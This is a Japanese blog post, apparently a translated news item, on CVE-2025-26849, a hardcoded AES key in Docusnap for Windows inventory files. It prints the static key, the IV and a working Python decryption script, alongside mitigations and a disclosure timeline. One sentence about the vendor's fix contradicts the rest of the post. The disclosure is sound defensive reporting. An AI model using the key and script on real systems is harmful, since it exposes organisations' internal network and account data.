Docusnap for Windows Flaw Exposes Sensitive Data to Attackers
2025/03/04 gbhackers — 先日に公開された、Docusnap for Windows クライアント・ソフトウェアに存在する脆弱性 CVE-2025-26849 を悪用する攻撃者は、ハードコードされた暗号化キーを悪用して、機密システム・インベントリ・ファイルを復号化し、重要なネットワーク情報を盗み出す機会を得るという。

Docusnap Client for Windows により生成されるインベントリ・ファイルで脆弱な暗号化メカニズムが使用されているため、攻撃に対する保護が無効になっていると、RedTeam Pentesting GmbH のサイバー・セキュリティ研究者たちが明らかにしている。このベントリ・ファイルには、 インストールされたアプリ/ファイアウォール・コンフィグ/ローカル管理者アカウントなどの詳細が取り込まれている。
脆弱性の技術的な内訳
市場をリードする IT インフラ・ドキュメント・ツール Docusnap は、クライアント・エージェントを使用して、Windows ドメインからシステム・データを自動的に収集する。
それらの収集された情報は、センター・サーバにアップロードされる前に、AES-256-CBC で暗号化された XML ファイルとして保存される。しかし、セキュリティ・アナリストたちは、2つの深刻な実装上の欠陥を発見した:
Windows クライアントの静的暗号化キー
Docusnap の .NET ベースのサーバ・ンポーネントのフォレンジック調査により、すべての Windows インベントリ・ファイルが、ハードコードされた AES 暗号化キー “\Pys6iB-jY{,&7+c/3uN,1a?~{2wC:L^x” と、初期化ベクター “N7IPe~R}w;1vuy5N” を共有していることが判明した。
この静的な実装により、アプリケーション・バイナリにアクセスできる、すべてのユーザーが復号化パラメータを抽出できた。これらの値を抽出する攻撃者は、単純な Python スクリプトを使用して、任意のインベントリ・ファイルを復号化できる。
from base64 import b64decode
import click
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad
K = "Pys6iB-jY{,&7+c/3uN,1a?~{2wC:L^x".encode("utf-8")
IV = "N7IPe~R}w;1vuy5N".encode("utf-8")
@click.command()
@click.argument("file", type=click.File("r"))
def decrypt(file):
data = file.read()
raw = b64decode(data)
cipher = AES.new(K, AES.MODE_CBC, iv=IV)
res = unpad(cipher.decrypt(raw), AES.block_size)
print(res.decode("utf-8"))
if __name__ == "__main__":
decrypt()
不十分なベンダーの修復
2024年11月の時点で通知された、Docusnap のバージョン 14 の最初のパッチは、欠陥のある静的暗号化アプローチを維持しながら、AES キーをローテーションするだけのものだった。
RedTeam の研究者たちは、.NET リフレクション手法を使用して、これらの “隠蔽によるセキュリティ” 対策を回避し、難読化されたアセンブリから更新されたキーを抽出できたという。つまり、このベンダーは、サイバー・セキュリティの専門家たちが推奨する、非対称暗号化またはインストールごとの一意のキーを、現時点では実装している。
運用への影響とリスク評価
この脆弱性 CVE-2025-26849 (CVSSv3:5.3:Medium) を悪用しても、資格情報の漏洩や、システムへの直接的なアクセスには至らないが、内部の脅威アクターや侵害されたアカウントにより、以下の悪意のアクティビティの障壁が大幅に下がるという。
- ドメイン全体での脆弱なソフトウェア展開のマッピング
- ファイアウォール・ルールのミスコンフィグの特定
- 横方向の移動に悪用する特権ローカル・アカウントの検出
Docusnap をコンプライアンス・ドキュメントに使用している組織には、機密データの集中リポジトリを誤って作成し、暗号化制御に関する GDPR/HIPAA 要件に違反する可能性がある。
緩和戦略
Docusnap が、適切な暗号化に対応した修正をリリースするまで、ユーザー企業は以下の回避策を実装する必要がある。
- SMB 共有権限の制限
Docusnap インベントリ共有への、“Authenticated Users” による読取りアクセスを取り消し、専用サービス・アカウントへのアクセスを制限する。 - ファイル・アクセス・パターンの監視
インベントリ・ディレクトリにリアルタイム監査を実装して、疑わしいアクセス試行を検出する。 - ネットワーク・セグメンテーションによる補足
Docusnap サーバとストレージを、一般のユーザー・ネットワークから分離して、潜在的な侵害を封じ込める。
以下の開示タイムラインが浮き彫りにするのは、サードパーティのリスク管理において、なかなか解消しない課題である:
| Date | Event |
| 2024-09-12 | Vulnerability discovered |
| 2024-12-04 | Docusnap v14 released with incomplete fix |
| 2025-03-04 | Public advisory published |
サイバーセキュリティ・アナリストである Dr. Elena Voss は、「このケースは、境界セキュリティへの過度の依存が、内部暗号化プラクティスを頻繁に無視する例を示している。ベンダーは、”無害な” バックエンド・プロセスであっても、ゼロ・トラストの原則を採用する必要がある」と述べている。
Docusnap の脆弱性が強調するのは、エンタープライズ・ソフトウェア・セキュリティ設計における重大なギャップであり、また、ハードコードされた認証情報と不十分なアクセス制御の危険性である。
この脆弱性の深刻度は低いと評価されているが、標的型侵入を仕掛けるために必要な、システム・インテリジェンスを攻撃者に提供するものである。
Docusnap を使用している組織にとって必要なことは、アクセス制限を直ちに実装し、ベンダーに対して根本的な暗号化の改善を迫ることだ。
IT ドキュメント・ツールが、機密データを統合するケースが増えるにつれ、集中化されたデータの山が敵対者の金鉱になっていく。それを防ぐにためには、サードパーティ・リスクに関する、厳格な評価が極めて重要になる。
このブログでは初登場の Docusnap ですが、Wikipedia では、「ネットワークの自動インベントリ作成/IT ドキュメント作成/ライセンス管理/権利分析のためのソフトウェア」と紹介されていました。本文中にもある通り、この脆弱性の深刻度は CVSSv3:5.3 とあまり高くはありませんが、Docusnap の用途を考えると、軽視できない脆弱性です。この脆弱性は、現時点では未修正のため、ご利用のチームは、本文中の「緩和戦略」をご参照下さい。
You must be logged in to post a comment.